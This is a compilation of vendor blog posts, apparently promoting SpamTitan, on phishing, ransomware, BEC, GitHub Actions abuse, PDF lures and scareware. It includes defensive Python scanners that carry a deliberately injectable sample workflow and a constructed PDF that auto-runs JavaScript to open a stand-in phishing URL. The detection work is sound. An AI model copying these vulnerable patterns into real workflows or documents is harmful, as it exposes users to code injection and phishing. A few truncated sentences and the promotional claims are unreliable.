At present the main way that hacking groups are accessing business networks is via phishing campaigns.
The single best way of tackling phishing campaigns is to use an email spam filter. This type of cybersecurity solution audits all incoming email traffic, checking for spam signatures, phishing characteristics and any indication of malware.
An award-winning anti-spam solution, SpamTitan offers the best possible tools to safeguard your organization from phishing and other email-based campaigns. At present more than 1,500 organizations use SpamTitan globally.
While you will see a multitude of spam filtering solutions that claim to adequately safeguard your organization from the smartest phishing tactics, one has become the chosen solution of managed service providers (MSPs) – TitanHQ. Here we examine the reasons for this choice.
- Advanced email blocking: SpamTitan supports uploadable block and permit lists per policy, advanced reporting, recipient verification and outbound email scanning. Whitelisting/blacklisting is also available at every hierarchical level of permissions within your network.
- Excellent malware protection: There are dual antivirus engines from two leading AV providers and sandboxing that leverages machine learning and behavioral analysis to tackle any file which appears to be dangerous.
- Protection against zero-day attacks: Machine learning predictive technology takes on zero-day attacks, and AI-driven threat intelligence blocks zero-minute attacks head on.
- Office 365 environment security measures: A range of defense-in-depth protection measures is available that can simply be added to Office 365 environments to greatly enhance security in the face of phishing and email-based malware campaigns.
- Easy integration: There is a straightforward configuration process for adding this to your existing service stack through the TitanHQ APIs, and MSPs benefit from streamlined management with RMM integrations.
- Data leak prevention: Strong data leak prevention rules that are easy to create and allow for tagging of data to spot and block internal data loss.
- Intuitive multi-tenant dashboard: The MSP-client hierarchy means that you can keep clients segregated and decide whether to manage client settings in bulk or on an individual basis. This is a set-and-forget solution, meaning only a low level of IT service intervention is required.
- White labelling: Can be supplied as a white-label version to reinforce an MSP’s brand.
- Industry-leading customer support: TitanHQ customer service leads the field, with world-class pre-sales, sales and technical support. MSPs are allocated a dedicated account manager, assigned sales engineer support, access to the Global Partner Program Hotline, and 24/7 priority technical support.
- Competitive pricing and monthly billing: MSPs benefit from a transparent pricing policy, competitive pricing, excellent margins, and monthly billing. The sales cycle is just 14 days.
If you would like to begin providing SpamTitan for your clients, contact the TitanHQ channel team at once and begin your free trial.
There has been a surge in the number of profit-generating cyberattacks in the last year, particularly within the healthcare sector in the USA.
In tandem with this, the ransoms demanded by hackers to release encrypted data have gone through the roof. Even where the ransom is paid, recovery can be very tricky, and in many cases the data is never handed back by the cybercriminals at all.
This is a situation that no organization wants to find itself in, so it is important to be sure you have addressed all possible weaknesses in your cybersecurity measures. Here we have listed the areas which, if unaddressed, are likely to allow hackers to disrupt your organization’s ability to operate.
Security Mistakes That Must Be Addressed
- Multi-Factor Authentication: When login details are stolen there is huge potential for hackers to access your databases. However, if multi-factor authentication is configured, this risk is mitigated, as a second stage of verification must be completed before access is granted.
- Email Security: Phishing presents a huge danger to all networks. Hackers send emails trying to get staff either to reply or to click on a link that leads to the installation of malware or adware on your servers. Ideally, from the cybercriminal’s point of view, they obtain the login credentials of a high-level executive who has permission to access all parts of the network. Configuring an advanced AI-based spam filter that uses sandboxing and greylisting will prevent this from happening 99% of the time.
- Security Awareness Training: As a lot of attacks, like the email attacks mentioned above, rely on interaction with employees, it is vital that you train these people to spot potential attacks. Regular refresher training courses are also important to keep everything fresh in the mind and to educate staff about new threats that have appeared since the last training session.
- Web Security: It is important to add security to police Internet activity on your networks. It would be very easy for an employee to unknowingly browse onto a site that is loaded with adware and malware. Using web filtering software will cut off access to malicious websites.
- Applying Patches & Software Updates: Hackers are swift to try and take advantage of software, firmware, and operating system flaws. Due to this it is vital that your organization applies patches and runs updates as soon as they become available. If this is not done, it is bound to be just a matter of time before someone gains access to your network and servers.
- Password Management Software: Creating weak passwords leaves you vulnerable to brute force attacks. Staff should be given the tools to set up and save strong, secure passwords.
- Creating an Incident Response Plan & Back-ups: ‘Fail to prepare, prepare to fail’ as the saying goes. Companies that have not planned for what to do in the event that they are infiltrated by a cyberattack could have irreparable damage inflicted upon them. Regular backups must be created and tested. It is also wise to store one copy of the backup off site.
During April 2021, cybercriminals were able to log onto the databases of Colonial Pipeline and install ransomware that led to the shutdown of a fuel pipeline system that serves the entire Eastern Seaboard of the USA.
This resulted in a lot of panic buying of fuel by Americans on the East Coast as fuel supplies were threatened. The knock-on effect was local fuel shortages and a surge in the price of gasoline to its highest level since 2015. Gasoline stockpiles on the East Coast dropped by 4.6 million barrels.
The DarkSide ransomware-as-a-service operation was blamed for the attack and has since been taken down. Before it was shut down, Colonial Pipeline handed over a $4.4 million ransom to remove the encryption from their files. Though handing over the ransom was a difficult decision, it was taken because of the danger facing fuel supplies: Colonial Pipeline provided almost half (45%) of the East Coast’s fuel. Another consideration was the length of time it might take to retrieve the files without the attacker-supplied decryption keys.
This attack should never have been able to reach such critical infrastructure. The subsequent review of the cyberattack showed that all it took for the attack to succeed was one compromised password used to remotely access the network. The compromised account was not secured with multi-factor authentication.
According to Charles Carmakal, senior vice president at cybersecurity firm Mandiant which was involved in the investigation, the compromised password was for a virtual private network account. The account may have been dormant but it was still possible to use the login credentials to gain access to Colonial Pipeline’s network.
As yet it remains unknown how the cybercriminals came to be in possession of this password. The password has since been located in a database of breached passwords that was made available via the dark web. It is possible that the account holder had reused the same password on a separate account that was breached. It is typical for passwords from data breaches to be used in brute force attacks, as password reuse is commonplace. Passwords are also obtained through phishing campaigns.
Mandiant searched for anything to suggest how the password was stolen by the cybercriminals. The cybersecurity experts found no evidence of hacker activity prior to April 29, 2021, nor any proof of phishing attempts. At this point in time it appears that how the password was obtained and the username determined may never be known.
It is quite obvious that this hack could have been stopped using cybersecurity best practices, including auditing accounts and closing down dormant accounts, setting unique and complex passwords for every account, configuring multi-factor authentication so that compromised passwords cannot be used for access, and installing a robust anti-spam solution.
Created in 2008, GitHub has recorded massive growth amongst developers and companies for its code hosting and sharing capabilities. These cover both open source and proprietary code, making it very popular, with more than 100 million code repositories currently on the platform.
Sadly, this also means that GitHub is a very attractive target for cybercriminals, who have used the platform’s popularity as a basis for several attack types, including ransomware, backdoor attacks and code injection campaigns. GitHub Actions is a feature of GitHub that provides a CI/CD workflow pipeline for software delivery into production. It is one of the main pieces of infrastructure in GitHub that automates software workflows. In a recent exploit, experts at Google Project Zero discovered a design vulnerability in GitHub Actions. This vulnerability could give a hacker write access to a repository, meaning that they could reveal encrypted secrets. One of the experts, Felix Wilhelm, was able to demonstrate the vulnerability using Microsoft’s Visual Studio Code GitHub repository, where he could inject code that was then run by the project’s new-issue workflow.
The flaws in Actions give cybercriminals ways to exploit GitHub’s infrastructure. Recently, code injection flaws and vulnerabilities in GitHub Actions allowed crypto-criminals to deploy cryptocurrency mining malware. The attacks have been observed since late last year. The attack targets repositories using Actions, the feature that automatically executes software workflows, to place malicious code into a workflow. The process leveraged by the hackers is slick: the malicious GitHub Actions code is first forked from the original workflows, and then a Pull Request merges the code back, together with the crypto miner code. The key to the attack is using GitHub’s own infrastructure to share malware and mine cryptocurrency on GitHub’s servers. The flaw in Actions means that the attack does not need the repository owner to approve the Pull Request. The crypto-miner code, misnamed npm.exe, is hosted on GitHub. The whole attack is expertly devised, using a mechanism that has, so far, made a mockery of GitHub’s critical infrastructure.
The worry in relation to this recent crypto mining attack on GitHub repositories is that the hackers are, yet again, leveraging the inherent infrastructure of a platform. Any weakness in the corporate structure can be targeted. Bolstering the security of these infrastructure hatches is crucial to stopping cyber-attacks. Source code is a critical system and GitHub is critical infrastructure. Firms and vendors using GitHub should ensure they follow security best practices. But even organizations not using GitHub as a source code repository may well be consuming source code hosted on GitHub. To address this, cybersecurity best practices must be implemented. People, processes, and technology are some of the cyber best practices, but adding awareness of possible infrastructure hacks is vital to keeping your business protected.
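The two weaknesses the text describes can both be caught by a review step before a workflow is merged: untrusted event text (an issue title, a PR branch name) interpolated straight into a `run:` shell script, and a `pull_request_target` job that checks out the fork's commit while holding a write-capable token. The following scanner is an added example written for this page; it is not code from GitHub, Project Zero or TitanHQ. The three workflow files it scans are constructed samples, the list of "untrusted" event fields is illustrative rather than GitHub's official enumeration, and the indentation-based handling of `run:` blocks is a simplification of real YAML parsing.

```python
import re

# Event-payload fields whose text is chosen by whoever opened the issue, PR or comment.
# Assumption: this list is illustrative, not GitHub's official enumeration.
UNTRUSTED_CONTEXT = re.compile(
    r"\$\{\{\s*github\.event\."
    r"(?:issue\.(?:title|body)"
    r"|pull_request\.(?:title|body|head\.(?:ref|label))"
    r"|comment\.body|review\.body"
    r"|head_commit\.(?:message|author\.(?:name|email))"
    r"|commits\[\d+\]\.(?:message|author\.(?:name|email)))"
    r"\s*\}\}"
)
# Checking out the fork's commit inside a pull_request_target job runs attacker code with a write token.
FORK_CHECKOUT = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}")


def run_script_lines(workflow_text):
    """Yield (line_no, text) for every line that is part of a `run:` shell script.
    Handles `run: <one-liner>` and `run: |` / `run: >` block scalars by indentation."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = re.match(r"^(\s*)(-\s+)?run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        rest = m.group(3).strip()
        if rest in ("|", ">", "|-", ">-", "|+", ">+"):
            j = i + 1
            while j < len(lines):
                line = lines[j]
                if line.strip() and len(line) - len(line.lstrip()) <= key_indent:
                    break  # back at the step's own indentation: the script is over
                if line.strip():
                    yield j + 1, line
                j += 1
            i = j
        else:
            yield i + 1, rest
            i += 1


def scan_workflow(name, workflow_text):
    """Return a list of (workflow name, line number, message) findings."""
    findings = []
    for line_no, text in run_script_lines(workflow_text):
        for m in UNTRUSTED_CONTEXT.finditer(text):
            findings.append((name, line_no,
                             "untrusted input interpolated into a shell script: " + m.group(0)))
    if re.search(r"\bpull_request_target\b", workflow_text):
        m = FORK_CHECKOUT.search(workflow_text)
        if m:
            line_no = workflow_text[:m.start()].count("\n") + 1
            findings.append((name, line_no,
                             "pull_request_target job checks out the fork's code with a write-capable token"))
    return findings


# Constructed sample workflows (not taken from any real repository).
VULNERABLE_WORKFLOW = """\
name: issue-triage
on:
  issues:
    types: [opened]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - name: Log the title
        run: |
          echo "New issue: ${{ github.event.issue.title }}"
"""

# Hardened: the untrusted value goes through an environment variable, so the shell never parses it.
HARDENED_WORKFLOW = VULNERABLE_WORKFLOW.replace(
    '        run: |\n          echo "New issue: ${{ github.event.issue.title }}"\n',
    '        env:\n          TITLE: ${{ github.event.issue.title }}\n'
    '        run: |\n          echo "New issue: $TITLE"\n')

FORK_BUILD_WORKFLOW = """\
name: build
on: [pull_request_target]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install && npm test
"""

if __name__ == "__main__":
    for name, text in [("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW),
                       ("fork-build", FORK_BUILD_WORKFLOW)]:
        for finding in scan_workflow(name, text) or [(name, 0, "no findings")]:
            print("%s:%d: %s" % finding)
```

The hardened variant shows the fix the scanner is steering toward: pass event text into the step through `env:` and reference it as a shell variable, so an attacker-chosen title is data rather than part of the command line.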
Some of the steps that you need to implement include:
- Stopping employees from visiting dangerous URLs or installing malicious software/files
- Preventing staff from accessing infected web portals
- Implementing GitHub security best practices when using the infrastructure to host source code
- Training staff to ensure they are conscious of security tricks and tactics
Preventing these attacks is possible with the WebTitan Cloud DNS filter. It tackles malware, phishing, viruses, ransomware and malicious sites.
A recent survey of IT security professionals, conducted by TitanHQ along with Osterman Research, has indicated that businesses most commonly witness security incidents involving business email compromise (BEC) attacks.
This type of attack is where a hacker pretends to be a genuine contact or company to fool someone into completing a fraudulent financial transfer or sharing protected information, or attempts to encrypt servers in order to demand a ransom for the encryption to be removed.
These attacks can impersonate a known company or else leverage a contact’s email account that has already been compromised in a hacking attack. The other common route is as simple as altering the display name to make the recipient believe the email has been sent by a real contact, often the CEO, CFO, or a supplier.
Lookalike or similar domains are also deployed in BEC attacks. This is where the cybercriminal copies the spoofed company’s email template or layout so that it seems perfectly real to the recipient.
BEC emails are expertly composed, most of the time, and aim to take advantage of an individual within an organization or a person in a specific position, more often than not the finance section of the organization. However, attacks have also been known to aim for the HR department, marketing department, IT department, and management.
In a lot of cases the hackers use the fact that the emails are quite realistic to engage an employee in a stream of emails before asking for a money transfer or data transfer to be completed. Even though this style of attack is not as common as phishing, the money stolen through it is far greater and growing year on year.
There are a number of important steps to take to defend against these attacks:
- Raise awareness of the threat by conducting staff training sessions that teach individuals how to spot a BEC attack.
- Create policies and processes requiring that all email requests to change bank account details, payment methods, or payroll direct deposit information be verified by calling the known contact directly on the telephone number you have on file.
- Implement a solid email security system.
A solid email security system reduces the chance of human error leaving you vulnerable to BEC attacks. It will block the attempts hackers make to steal email credentials. Machine learning techniques protect against zero-day attacks, and DMARC and Sender Policy Framework (SPF) checks identify emails from senders not permitted to send messages from a particular domain.
Ideally you should use an email security system like SpamTitan. This solution uses all of the aforementioned methods of securing your organization from BEC attacks. When it is used along with the correct staff training and administrative measures, your organization will be properly equipped to address the threat posed by BEC attacks.
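How SPF, DMARC alignment and lookalike-domain checks fit together for a single inbound message, as an added example written for this page (it is not SpamTitan's implementation or any product code). The DNS records are constructed and looked up from a dictionary so the example runs offline; DKIM is left out, so a message is treated as DMARC-compliant only when SPF passes and the envelope sender aligns with the visible From: domain; the "organizational domain" is approximated by the last two labels instead of a public-suffix list; and the trusted-domain list, addresses and IPs are all made up for the demonstration.

```python
import ipaddress

# Constructed DNS answers standing in for real TXT lookups (assumption: this example runs offline).
TXT_RECORDS = {
    "example-corp.test": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailhost.test -all",
    "_spf.mailhost.test": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 -all",
    "_dmarc.example-corp.test": "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example-corp.test",
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, sender_ip, records=TXT_RECORDS, depth=0):
    """Evaluate the SPF record of `domain` for the connecting IP.
    Supports ip4/ip6/include/all, enough for a typical corporate record; a/mx/exists are ignored."""
    record = records.get(domain)
    if record is None or not record.startswith("v=spf1") or depth > 10:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term.startswith(("ip4:", "ip6:")):
            matched = ip in ipaddress.ip_network(term[4:], strict=False)  # False on v4/v6 mismatch
        elif term.startswith("include:"):
            matched = check_spf(term[8:], sender_ip, records, depth + 1) == "pass"
        elif term == "all":
            matched = True
        else:
            matched = False
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"


def parse_dmarc(domain, records=TXT_RECORDS):
    """Return the DMARC tags of `domain` as a dict, or None when no policy is published."""
    record = records.get("_dmarc." + domain)
    if not record or not record.startswith("v=DMARC1"):
        return None
    return dict(tag.strip().split("=", 1) for tag in record.split(";") if "=" in tag)


def org_domain(host):
    # Simplification: the last two labels stand in for the organizational domain.
    return ".".join(host.lower().split(".")[-2:])


def spf_aligned(from_domain, mailfrom_domain, mode):
    """DMARC identifier alignment: strict ('s') needs an exact match, relaxed ('r') the same org domain."""
    if mode == "s":
        return from_domain.lower() == mailfrom_domain.lower()
    return org_domain(from_domain) == org_domain(mailfrom_domain)


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(domain, trusted_domains):
    """Return the trusted domain that `domain` imitates (edit distance <= 2), or None."""
    for trusted in trusted_domains:
        if domain != trusted and levenshtein(domain, trusted) <= 2:
            return trusted
    return None


def assess_message(from_header, mailfrom, sender_ip, trusted_domains, records=TXT_RECORDS):
    """Combine SPF, DMARC alignment and lookalike checks for one inbound message.
    from_header: RFC 5322 From: value, e.g. 'Jane Doe <jane@example-corp.test>'
    mailfrom:    envelope sender (Return-Path), which is what SPF is evaluated against.
    Returns (verdict, reasons)."""
    from_domain = from_header.rsplit("@", 1)[1].rstrip("> ").lower()
    mailfrom_domain = mailfrom.rsplit("@", 1)[1].lower()
    reasons = []
    spf = check_spf(mailfrom_domain, sender_ip, records)
    dmarc = parse_dmarc(from_domain, records)
    policy = dmarc.get("p", "none") if dmarc else "none"
    if dmarc is None:
        reasons.append("no DMARC policy published for " + from_domain)
    elif spf != "pass" or not spf_aligned(from_domain, mailfrom_domain, dmarc.get("aspf", "r")):
        reasons.append("DMARC fails: SPF result '%s' for %s, From: domain %s" % (spf, mailfrom_domain, from_domain))
    twin = lookalike(from_domain, trusted_domains)
    if twin:
        reasons.append("lookalike domain %s imitates trusted domain %s" % (from_domain, twin))
    if twin or (reasons and policy == "reject"):
        return "reject", reasons
    if reasons and policy == "quarantine":
        return "quarantine", reasons
    return ("flag", reasons) if reasons else ("accept", reasons)


if __name__ == "__main__":
    trusted = ["example-corp.test"]
    print(assess_message("Jane <jane@example-corp.test>", "jane@example-corp.test", "198.51.100.10", trusted))
    print(assess_message("Jane <jane@example-corp.test>", "bounce@attacker.test", "192.0.2.5", trusted))
    print(assess_message("Jane <jane@examp1e-corp.test>", "jane@examp1e-corp.test", "192.0.2.5", trusted))
```

The three calls at the bottom cover the cases the text describes: a genuine message from the corporate mail host, a display-name spoof whose envelope sender belongs to a domain with no SPF record (rejected by the target domain's own `p=reject` policy), and a lookalike domain that passes no DMARC check at all but is caught by its edit distance from a trusted domain.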
If you would like to learn more about how SpamTitan secures your company, call the TitanHQ team as soon as you can.
There has been a surge in phishing since the beginning of the COVID-19 pandemic in early 2020, and there is no sign, or likelihood, that this will ease off, due to the massive profits that cybercriminals are making from these attacks. Hackers continue to devise new and more believable strategies as individuals and organizations become aware of their attack methods and cybersecurity measures are enhanced to tackle them. Recently, a sharp focus by hackers on PDF files for phishing purposes has been noticed.
Files like this permit the use of rich-text content such as URLs, pictures, GIFs, and internal scripts linked to the file. In the most recent string of attacks, phishing campaigns incorporate PDF attachments that use a range of tactics to bring users to a malicious site in order to harvest data. Here are five styles of PDF phishing attack to be aware of at present:
- File Sharing and Phishing: The majority of web users have either a Google Drive account or a Microsoft OneDrive account. Access to one of these will give hackers enough info and private data to. Cybercriminals use PDF files to make viewers hand over the private login details that will allow them to infiltrate the targeted victim’s accounts. The picture shows a prompt to access a file that the user instinctively feels they should click on within their cloud drive. However, a phishing page appears when the user clicks the URL. This phishing page is identical to OneDrive’s or Google Drive’s landing page, so users who do not check the actual domain name in their browser window will simply hand over their username and password. Once they do, the hacker receives the credentials and can access the cloud drive account.
- Fake CAPTCHA Redirects: A CAPTCHA is a recognized symbol for Internet users and therefore is a straightforward way to fool users into visiting a URL. This attack features the hacker placing an image of the common Google CAPTCHA interface within the sent email. Users recognize the image and choose “Continue” and expect to see the website that they are attempting to access. When the link is visited, the user is taken to a cybercriminal-controlled site where users must hand over their private information.
- Ecommerce Site Scams: The most recent PDF phishing attacks feature popular ecommerce logos to trick users into thinking that clicks are genuine. Ecommerce portals often require private information and credit card data, so attackers can buy products using the targeted victim’s payment data. In some cases the PDF file might include the official Amazon logo and ask users to visit the link to buy products. Rather than visiting Amazon in the user’s browser, a cybercriminal-controlled website pretending to be the legitimate portal asks users to authenticate. When users hand over their credentials, the cybercriminal gains the login information needed to access their ecommerce account.
- Play Buttons on Static Images: If there is a play button on a picture it will, typically, be clicked on in order to play a video. A recent scam, targeting cryptocurrency traders and investors, gets PDF readers to open the file in the hope that they will click the link on the fake video image. Rather than playing a video, users are taken to a phishing website that asks them to hand over their credit card information for a dating portal.
- Using Popular Logos for Malicious Redirects: It is not difficult to prompt users to click links using recognizable logos. When hackers use a logo from a well-known brand, they can fool users into clicking the logo. With this attack, an image of a well-known brand is placed within the PDF file with the offer of a discount. It appears to be the same as a normal brand sale, so it fools users into clicking on the image. After the user does so, a browser opens and loads a redirect site. The redirect site then sends the user on to an attacker-controlled phishing page. Just as with the CAPTCHA scam, users who do not realize that the redirect is not what it seems may hand over private data or login credentials to access the platform.
Using email filters to stop these attacks means that malicious attachments are recognized and prevented from reaching the intended recipient’s inbox. A SpamTitan email filter blocks spam, viruses, malware, phishing attempts and other email threats that target companies, MSPs and educational bodies worldwide.
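All five PDF lures above share one mechanism: a link or action object inside the file that sends the reader somewhere the visible image does not suggest. An attachment filter can surface those before a user ever sees the PDF. The inspector below is an added example written for this page, not SpamTitan's or any vendor's code. It builds its own small PDF fragment (including one link hidden inside a FlateDecode stream, which a naive raw-bytes scan would miss), pulls every URL and every active action type out of it, and flags URLs whose hostname borrows a brand name without being under that brand's real domain; the brand-to-domain table and all URLs are constructed for the demonstration, and the "registrable domain" is approximated by the last two labels.

```python
import re
import zlib
from urllib.parse import urlsplit

# Brand names and the registrable domains that legitimately carry them (assumption: illustrative table).
BRAND_DOMAINS = {
    "onedrive": {"live.com", "microsoft.com", "onedrive.com"},
    "google": {"google.com"},
    "amazon": {"amazon.com"},
}
URL_RE = re.compile(rb"https?://[^\s'\")<>]+")
# Action subtypes that execute something or leave the document, as opposed to /URI links.
ACTIVE_ACTION_RE = re.compile(rb"/S\s*/(JavaScript|Launch|SubmitForm|GoToR|ImportData)\b")


def pdf_views(data):
    """Yield the raw bytes plus every stream that inflates with zlib, so links kept inside
    compressed objects are scanned as well (many real PDFs store annotations that way)."""
    yield data
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue


def registrable(host):
    # Simplification: the last two labels stand in for the registrable domain.
    return ".".join(host.split(".")[-2:])


def inspect_pdf(data):
    """Return the URLs, active action types, brand-lookalike URLs and auto-open flag found in a PDF."""
    urls, actions = [], []
    for view in pdf_views(data):
        for m in URL_RE.finditer(view):
            url = m.group(0).decode("latin-1")
            if url not in urls:
                urls.append(url)
        for m in ACTIVE_ACTION_RE.finditer(view):
            name = m.group(1).decode()
            if name not in actions:
                actions.append(name)
    suspicious = []
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        for brand, legit in BRAND_DOMAINS.items():
            if brand in host and registrable(host) not in legit:
                suspicious.append(url)
                break
    return {"urls": urls, "active_actions": actions, "brand_lookalike_urls": suspicious,
            "auto_open": b"/OpenAction" in data or b"/AA" in data}


def build_sample_pdf():
    """Constructed PDF fragment for the demo (not a real-world sample and not a complete file):
    a plain-text link annotation, a second link hidden in a FlateDecode stream, and an
    /OpenAction JavaScript entry that fires as soon as the document is opened."""
    link = (b"<< /Type /Annot /Subtype /Link /Rect [100 100 300 140] "
            b"/A << /S /URI /URI (https://onedrive-secure-login.example-phish.test/open) >> >>")
    hidden = zlib.compress(b"<< /Type /Annot /Subtype /Link "
                           b"/A << /S /URI /URI (https://www.amazon.com/deals) >> >>")
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript "
            b"/JS (app.launchURL(\"https://captcha-verify.example-phish.test/continue\", true);) >> >> endobj\n"
            b"3 0 obj " + link + b" endobj\n"
            b"4 0 obj << /Length " + str(len(hidden)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + hidden + b"\nendstream\nendobj\n"
            b"%%EOF\n")


if __name__ == "__main__":
    for key, value in inspect_pdf(build_sample_pdf()).items():
        print(key, "->", value)
```

On the constructed sample the inspector reports three URLs, flags only the OneDrive lookalike (the Amazon link resolves to the brand's own registrable domain), records the `JavaScript` action and notes that the file auto-runs it on open; any one of those last three findings is a reasonable quarantine trigger for an unsolicited attachment.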
As workers begin to return to offices following the COVID-19 vaccine rollout, hackers are launching new campaigns to take advantage of this turn of events.
This follows previous attacks that sought to take advantage of interest in the COVID-19 virus at the height of the pandemic. Workers going back to their usual place of work has created an opportunity for scammers, who have launched a new phishing campaign targeting workers returning to offices.
The new attacks claim to be sent from the organization’s Chief Information Officer to advise staff of new protocols and processes devised to help returning workers avoid any possibility of infection. They appear to have been sent only internally within the organization, and even include the organization’s logo and what looks like the CIO’s signature. A URL is included that directs recipients to a Microsoft SharePoint page to view/download two documents – a COVID-19 information sheet and an implementation letter listing the steps the company has put in place as a result of guidance from the Centers for Disease Control and Prevention (CDC), the World Health Organization (WHO), and local health bodies.
While the majority of phishing attacks try to bring email recipients to a phishing form that harvests Office 365 credentials, this campaign goes one step further in that the phish is only initiated once the link is clicked. When it is, a fake Microsoft login prompt pops up and credentials must be entered in order to access the files. Once the credentials are handed over, a message appears informing the staff member that their account or password is incorrect, and they must enter it again before they are finally brought to a genuine Microsoft page and given access to the documents on OneDrive. This means that there is no clear indication that credentials have been phished.
This COVID-19 phishing campaign, like many others launched during the pandemic, feature. In this case, the emails have been excellently composed and written for individually targeted organizations, making them appear authentic and likely to trick lots of people. It remains unknown what the cybercriminals intend to do with the stolen data once it has been collected. The credentials could be used to harvest the protected data held within Office 365 email accounts, would allow the cybercriminals to establish a foothold in the corporate network for a more extensive compromise, or could be sold for a profit to other cybercriminal groups.
The best tactic for dealing with this level of threat is to use an advanced spam filtering solution like SpamTitan. With SpamTitan implemented, phishing attacks like this are spotted and dealt with at the gateway, so that employees are not relied on to prevent the network being infiltrated.
Contact the TitanHQ team now to enhance your security posture and tackle the dangers of cybercriminal attacks on your organization.
A flaw in the mobile Safari browser has been targeted by cybercriminals and used to extort money from people who have previously used their mobile device to access pornography or other illegal content. The Safari scareware stops the user from logging on to the Internet on their device by loading a series of pop-up messages.
A popup is shown that states Safari cannot open the requested page. Clicking on OK to shut the message triggers another popup warning. Safari is then locked in an endless loop of popup ads that cannot be removed.
A message is shown in the background stating the device has been locked because the user has been identified as having viewed illegal web content. Some users have reported messages including Interpol banners, which are intended to make the user believe the lock has been put on their phone by law enforcement. The only way of regaining access to the device, according to the popups, is to pay a fine.
One of the domains used by the hackers is police-pay.com; however, few users would likely be tricked into thinking the browser lock was put in place by a police department as the fine had to be paid in the form of an iTunes gift card.
Other messages tell the user that police action will be taken if the payment is not made. The hackers claim they will send the user’s browsing history and installed files to the Metropolitan Police if the ransom is not paid.
The Safari scareware campaign was discovered by Lookout, which passed details of the exploit onto Apple which addressed the flaw to block the attacks in iOS version 10.3. Scareware attacks such as these are common.
Scareware is not the same as ransomware, although both are used to extort money. In the case of ransomware, access to a device is obtained by the hacker and malicious file-encrypting malware is installed. That malware then locks users’ files with powerful encryption. If a backup of the encrypted files is not maintained, the user faces loss of data if they do not pay the hackers for the key to decrypt their locked files.
Scareware may incorporate malware, although more commonly – as was the case with this Safari scareware campaign – it involves inserting malicious code on websites. The code is run when a user with a vulnerable browser visits an infected webpage. The thinking behind scareware is to scare the end user into paying the ransom demand to unlock their computer. In contrast to ransomware, which cannot be unlocked without the necessary decryption key, it is usually possible to unlock scareware-locked browsers with a little computer knowledge. In this instance, control of the phone could be regained by clearing the Safari cache of all cookies and data.
Digimine malware was first spotted in a campaign targeting users in South Korea; however, the attacks have now gone global. Digimine is a cryptocurrency mining malware that is installed and used to hijack the CPU and GPU on an infected device and use it to mine the cryptocurrency Monero.
The increase in popularity of cryptocurrency, and its meteoric rise in value, means mining cryptocurrency can be highly profitable. Mining cryptocurrency is the verification of cryptocurrency transactions for digital exchanges, which involves using computers to complete complex numerical problems. For verifying transactions, cryptocurrency miners are rewarded with coins, but cryptocurrency mining requires a lot of processing power. To make it profitable, it must be carried out on an industrial scale and hackers have realized the best way to do this is to use other people’s computers and servers. The processing power of hundreds of thousands of devices would result in the operation becoming highly profitable for cybercriminals, a fact that has certainly not been missed by the creators of Digimine malware.
Infection with Digimine malware will see the victim’s device slowed, as its processing power is being used mining Monero. However, that is not the only problem. The campaign spreading this malware variant works via Facebook Messenger, and infection can see the victim’s contacts targeted, and could possibly lead to the victim’s Facebook account being hijacked.
The Digimine malware campaign is being conducted through the Desktop version of Facebook Messenger, via Google Chrome instead of the mobile app. Once a victim is infected, if their Facebook account is set to login automatically, the malware will send links to all individuals in the victim’s contact list. Visiting those links will result in the installation of the malware, the generation of more messages to contacts and more infections, building up an army of hijacked devices for mining Monero.
Infections were first seen in South Korea; however, they have now spread throughout east and south-east Asia, and beyond, to Vietnam, Thailand, the Philippines, Azerbaijan, Ukraine, and Venezuela, according to Trend Micro.
A similar campaign has also been seen by FortiGuard Labs. That campaign is being carried out by the actors behind the ransomware VenusLocker, who have similarly changed to Monero mining malware. That campaign also began in South Korea and is spreading quickly. Instead of using Facebook Messenger, the VenusLocker gang is using phishing emails.
Phishing emails for this campaign include infected attachments that install the miner. One of the emails claims the victim’s details have been accidentally exposed in a data breach, with the attachment supposedly containing details of the attack and instructions to follow to mitigate the risk.
Cybercriminals will always focus a lot of their efforts on stealing healthcare records due to the high return they can make from obtaining addresses, Social Security and financial data. Hackers can sell these for a high price on darknet markets or use them to commit identity theft.
So far in 2021, millions of records holding valuable private information have been illegally obtained by cybercriminals using phishing tactics. Once a breach is discovered, the healthcare organization has a legal responsibility under the Health Insurance Portability and Accountability Act of 1996 (HIPAA) to notify the affected patients. The Department of Health and Human Services (HHS) publishes a web portal through which HIPAA breach incidents are reported. This portal can also be accessed by the public, who can see the details of confirmed HIPAA breaches.
Phishing campaigns can be targeted at individuals with high-privilege accounts, or they can be randomized, with millions of users receiving the same email. Untargeted attacks focus on quantity over quality. The attacker hopes that just a small percentage of people will fall for the phishing message. With just a small percentage of victims, an attacker can still generate thousands in revenue from a single campaign.
Spear-phishing campaigns are much more targeted and effective. Fewer email messages are sent to targeted users, but the campaign can be much more potent. With a high-privileged account or successful ransomware installation, an attacker could make millions from their efforts. Ransomware targeting businesses asks for thousands in return for private keys to decrypt data, or an attacker could use stolen credentials to exfiltrate data from corporate servers.
